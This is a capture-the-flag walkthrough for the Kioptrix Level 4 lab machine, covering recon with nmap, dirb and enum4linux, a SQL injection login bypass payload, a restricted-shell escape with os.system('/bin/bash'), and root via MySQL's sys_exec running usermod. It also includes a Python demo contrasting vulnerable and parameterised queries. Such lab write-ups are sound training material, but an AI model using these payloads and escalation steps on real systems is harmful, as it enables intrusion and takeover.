Hello, in this article I will show you step by step how to solve Kioptrix Level 4. The goal of this CTF is to become root. Click to get more information about the CTF.
LEVEL: Medium
Steps
- Learning the target's IP address with the Netdiscover tool
- Detecting open ports with the Nmap tool
- Collecting information via port 80 with the Dirb tool
- Collecting information via port 445 with the Enum4linux tool
- Detecting a SQL injection login bypass vulnerability on the login page
- Running system commands through MySQL
Based on the IP information of the Kali machine, the IP address used by the target machine was determined with the following command.
netdiscover -r 192.168.88.0/24

Open ports on the target machine were detected as follows.
nmap -A -Pn -n -sV -sC --reason -p- 192.168.88.223


Fuzzing was performed on the open port 80 with the Dirb tool.
dirb http://192.168.88.223/

After fuzzing on port 80, a similar process was performed on the Samba service serving on port 445. For this, a tool called enum4linux was used as follows.
After the tool was run, user information that would be valid on the application was obtained. This information was stored in a file (second image) for later use.
enum4linux 192.168.88.223


In this step, the paths obtained via port 80 were checked one by one. During these checks, a login panel page like the one below was encountered.

Using the username obtained from the enumeration performed on Samba, a SQL injection payload that makes the expression "root' or '1'='1" evaluate to true was entered in the password field. When the result was examined, it was seen that a SQL injection bypass had been achieved on the login screen.
A similar login was performed for the user named “robert”. When the screen shown after login was checked, it was seen that additional information was displayed as the password of the relevant users. This information was noted for later use.
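To show why the bypass above works and how it is closed, here is an added example that is not code from the Kioptrix 4 application (which uses PHP and MySQL): a stand-in login check in Python on an in-memory SQLite table, running the page's payload against a string-concatenated query and against a parameterised one. The table name, column names and sample users are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the target's member table
# (names and passwords are assumptions, not taken from the Kioptrix 4 application).
SAMPLE_USERS = [("john", "s3cret"), ("robert", "pa55w0rd")]

# The payload the walkthrough entered in the password field.
PAYLOAD = "root' or '1'='1"


def _connect():
    """Build an in-memory database with a members table and the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(username, password):
    """Login check built by string concatenation, the pattern the bypass exploits.

    The quote in the payload closes the password literal and the trailing
    `or '1'='1` makes the WHERE clause true for every row, so the query
    returns a user even though the password is wrong."""
    conn = _connect()
    query = ("SELECT username FROM members WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    conn.close()
    return row is not None


def login_safe(username, password):
    """Same check with bound parameters: the payload is compared as a plain
    string against the stored password and can never change the query structure."""
    conn = _connect()
    row = conn.execute(
        "SELECT username FROM members WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    conn.close()
    return row is not None


if __name__ == "__main__":
    print("concatenated query, payload:", login_vulnerable("john", PAYLOAD))  # True
    print("parameterised query, payload:", login_safe("john", PAYLOAD))       # False
    print("parameterised query, real password:", login_safe("john", "s3cret"))  # True
```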


Work on port 80 was briefly interrupted and the password information obtained was tested on SSH. In these tests, the user “robert” was successfully logged in.
After logging in, basic commands were run and it was determined that a program running for the “robert” user blocked basic bash commands. After a few attempts, the restricted shell was bypassed with the following command.
echo os.system("/bin/bash");

After this step, checks for privilege escalation on the target were started. After checking a few areas, the source code of the web application running on the target was examined. Here, the MySQL credentials used by the application were obtained.
It was observed that the MySQL service running on the target could be connected to as the root user without any password.

Some checks were made to run OS commands through MySQL using methods such as UDF (User Defined Function). In these checks, it was observed that a command with root permissions could be run on the OS using the MySQL function named “sys_exec” defined in MySQL.
To do something a little different at this stage, the “john” user was given “sudo” rights so that the existing password information could be used.
SELECT sys_exec("usermod -a -G admin john");
After this stage, an SSH connection was established as the user john and root rights were obtained. Then, the CTF was completed by reading the flag in the “/root” directory.


Summary
- After finding the SQL injection login bypass vulnerability on the CTF, connecting to the target machine, then bypassing the restricted shell, connecting to MySQL via the source code and then building the scenario to become root was, in my opinion, a scenario that resembled real life. I can say that it is a CTF in OSCP format.
Click here to see my other articles about OSCP walkthroughs. Link